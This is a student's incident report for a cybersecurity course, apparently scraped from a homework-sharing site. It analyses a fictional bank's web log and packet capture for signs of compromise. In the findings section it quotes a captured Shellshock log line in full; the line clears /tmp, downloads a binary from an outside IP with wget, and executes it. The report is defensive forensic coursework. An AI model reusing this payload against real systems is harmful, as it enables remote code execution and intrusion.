Blumenstein_E_CST610_Project_3 (1) (2)
docx
keyboard_arrow_up
School
University of Maryland *
*We aren’t endorsed by this school
Course
610
Subject
Information Systems
Date
Jan 9, 2024
Type
docx
Pages
14
Uploaded by afeeblemind
CST 610 Project 3
Cyberspace and Cybersecurity Foundations
Security Event and Incident Report
Prepared By: Elliott Blumenstein
Version 1.0
Table of Contents
Introduction
....................................................................................................................................
3
Objectives
...............................................................................................................................................
3
Definitions
...............................................................................................................................................
3
Predictions
..............................................................................................................................................
3
Reflections
..............................................................................................................................................
3
Introduction
This report will document and analyze the incident/event, the response taken, and the prevention of future incidents/events. We will provide details of the incident in FICBank’s infrastructure, like when and how it was detected, the possible impact, and the actions taken to remedy this issue.
The goals are to give the company an idea of what we want out of this investigation and to give an account of our findings. We want to ensure no confusion in this provide, so definitions of certain words or phrases are listed. It will clarify some details and provide a better understanding of what is being reported.
FICBank is a small company and cannot always have IT professionals on the ground monitoring. We predict that there will be different indicators of comprise, giving the tools that will be most useful to identify the cause and outcomes of using those tools. The company will be given details of the incident(s) using tools and techniques. We will provide screenshots of each incident we find and provide those details.
Lastly, we will summarize the report. From the tools we used to our approach to identifying the incidents. The challenges we faced during this process will give us an idea of what can be done in the future. This report will be the starting point for FICBank in its endeavor to protect its infrastructure from outside threats. Objectives
This report aims to identify Indicators of Compromise and investigate using forensic tools,
techniques, and practices. The report will provide detailed findings once we analyze the Access_2 log file and CST610Project2Wireshark pcap file.
Definitions
“Indicators of Compromise are defined as forensic artifacts that can be used as signs to denote a system has been compromised by an attack or was otherwise infected by malicious software”
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
(Catakoglu et al., 2016, p. 3, para.1).
“The root Cause Analysis (RCA) is a structured investigation that aims to identify the real cause of
a problem and the actions necessary to eliminate it” (Wagen, p.1, 2017).
Predictions
Usually, successful logins are only a few tries, but multiple login attempts could indicate that a bad actor is trying to access the system. A lockout should occur after multiple
reentry times, but if not, that should be implemented into the solution. Another type is unusual outbound network traffic. “If the outbound traffic within the ICS network increases significantly or is not in the typical model, there could be malicious activity” (Asiri et al., 2023). The increase will alert us that something is suspicious, and the team will investigate this issue. “A large amount of database reads and queries is a clear indicator that an attacker
has penetrated the system” (Asiri et al., 2023). The database is vital in FICBank’s infrastructure as the storage will store all data for transactions, searches, customer information, etc. These are just some types of IOCs.
For FICBank to ensure that it receives the root cause of the reported events, we will need to use specific tools, techniques, and practices to investigate appropriately. Wireshark is just one tool we will use to analyze data. Wireshark is a network protocol analyzer or an application that captures packets from a network connection (What is wireshark and how to use it: Cybersecurity: Comptia). We will use Wireshark to analyze the log files and see if there are any anomalies. If there are any events, the program can trace the connections of where the event came from. This program offers more features and will likely provide more information about security incidents. Anaconda is a program that allows the use of Python coding. This program will input a code and give us an output. We could use this program to see how many IP
addresses accessed the database, how many HTTP tunneling attempts occurred, and which IP had the most traffic. These are just some of the capabilities this program can provide us with. There are techniques we will utilize in this investigation. Log analysis would be an essential technique to use. Viewing the log data from the system can show us which IP address has the most traffic, if there is raw data within the log file, and view the network device. Traffic analysis is another technique we will be using in this investigation. We will examine network traffic to identify unusual activities like influx in traffic, unknown flow IP
addresses, and unauthorized access to the database. The most important aspect of this is unauthorized access. Unauthorized access could indicate an insider threat at the company or
a malicious code was input into the system to allow someone access.
Now that we have discussed the tools and techniques we could use, the next is our practices. “The root Cause Analysis (RCA) is a structured investigation that aims to identify
the real cause of a problem and the actions necessary to eliminate it” (Wagen, 2017). The RCA will be used to uncover the problems, understand the problem, and eliminate the problem. We will then analyze how to keep the business safe from other IT infrastructure problems. With the provided tools, techniques, and practices, the expected outcome is to find suspicious network traffic, unauthorized access to the system, and possibly some viruses in the data. FICBank is a small banking company that cannot always have cybersecurity personnel monitoring its systems. I expect that since they have a weak IT infrastructure, a bad actor has exploited this and got into their system. We will determine what has happened
and provide FICBank with practices to prevent these issues from occurring again.
Events and Indicators of Compromise Work Products
Figure 1. Nessus Tenable Vulnerability Report
The Nessus reporting tool provides 23 vulnerabilities and a list of some IP addresses. We need to purchase a license through Nessus to receive a full scan, but at least this gives us a sample of what is in Access-2.log. The pie graph to the right shows’ percentages of each vulnerability; high vulnerability only makes up 3%, medium vulnerability makes up 10%, and info makes up 70%.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Figure 2. High Vulnerability Example in Tenable The great thing about
Nessus is that it provides us with a solution to reject certain queries. This vulnerability has a status of High. Also, the information provided gives us a description of what the vulnerability is.
Figure 3. Graph from Notepad++ showing the amount of activity
Reviewing the Access_2 logfile, we see that on October 1
st,
there was an influx of activity. The day
before and days after the influx, activity went down. This could mean that there was unauthorized access to the database. Unauthorized access could mean that malware was introduced. The influx could allow a hole in the database to allow persons or programs to enter and create code to execute commands.
Figure 4. Line in Access_2 shows successful access to the system and the shellshock vulnerability. The IP address 61.161.130.241 has malware contained in its log file line. () { :; }; /bin/bash -c \
x22rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-ionw
from this portion of the line we see the word /bin/bash, this is an attempt to exploit the shellshock vulnerability. This vulnerability allows whoever is accessing the system to execute commands. We
also noticed the HTTP status code 200, which indicates that they had a successful connection.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Figure 5. Line 2223 in Wireshark
The figure above is from a program called Wireshark. We use Wireshark to do a packet-level analysis from a PCAP file from FICBank. The presence of MZ in a response purporting to be an image/jpeg is a significant red flag. The connection Keep-Alive
means that the connection will be kept open
Figure 6. Results for analysis using TrIDNET.
This file that was exported from Wireshark shows an executable extension. This could mean that the image could contain malware and comprise the system.
61.161.130.241 - - [30/Sep/2015:10:36:01 -0400] "GET / HTTP/1.1" 200 867 "() { :; }; /bin/bash -
c \x22rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-fiuz >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-fiuz >> /tmp/Run.sh;echo /tmp/China.Z-fiuz >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-fiuz >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-fiuz >> /tmp/Run.sh;echo /tmp/China.Z-fiuz >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22"
This is a line from the Access_2 Log file, which contains some malicious commands. As stated before, this portion highlighted in yellow shows that the Shellshock vulnerability was exploited in Bash; this exploit could allow attackers to execute commands on the system. A file downloaded and saved as /tmp/China is highlighted in green. Z-file. We see this numerous times in this line. The /tmp directory was cleared before downloading this file and saving it as the tmp/China. It is worth noting that that just because it says China does not mean that this malicious code came from China.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Reflection
General:
1.
What digital forensic tools did you use during the investigation? Nessus Tenable, LogViewPlus, Wireshark, Notepad ++, and TrIDNet
2.
What was your approach to identifying potential indicators of compromise?
We used a scan to see if there were any vulnerabilities. After that we investigated those vulnerabilities like the shellshock vulnerability. Using Logviewplus, we see that activity was high
on certain days. Monitoring the network traffic for any unusual activity. 3.
How did you verify the credibility of the artifacts from FICBANK's employees?
The programs allowed us to see multiple attempts from unauthorized entities to access the system. 4.
What challenges did you face during the investigation? Analyzing the files provided could be delicate and demanding. Also, not having full rights to specific programs hindered some investigations. 5.
How did you ensure that the investigation met industry standards?
Using guidelines from multiple agencies to the best of our ability, we conduct a promising investigation. We ensured that sticking with a structured outline allowed us to investigate as best as possible. Also, using programs like Wireshark and TriID, we tried to align with industry standards.
Reference
Asiri, M., Saxena, N., Gjomemo, R., & Burnap, P. (2023). Understanding indicators of compromise against cyber-attacks in industrial control systems: A security perspective. ACM Transactions on Cyber-Physical Systems, 7(2), 1–33. https://doi.org/10.1145/3587255
Catakoglu, O., Balduzzi, M., & Balzarotti, D. (2016). Automatic extraction of indicators of compromise for web applications. Proceedings of the 25th International Conference on World Wide Web
, 1–11. https://doi.org/10.1145/2872427.2883056 Wagen, G. (2017). An empirical study of root-cause analysis in information security ResearchGate. https://www.researchgate.net/publication/319753715_An_Empirical_Study_of_Root-
Cause_Analysis_in_Information_Security_Management
What is wireshark and how to use it: Cybersecurity: Comptia
. CompTIA.org. (n.d.). https://www.comptia.org/content/articles/what-is-wireshark-and-how-to-use-it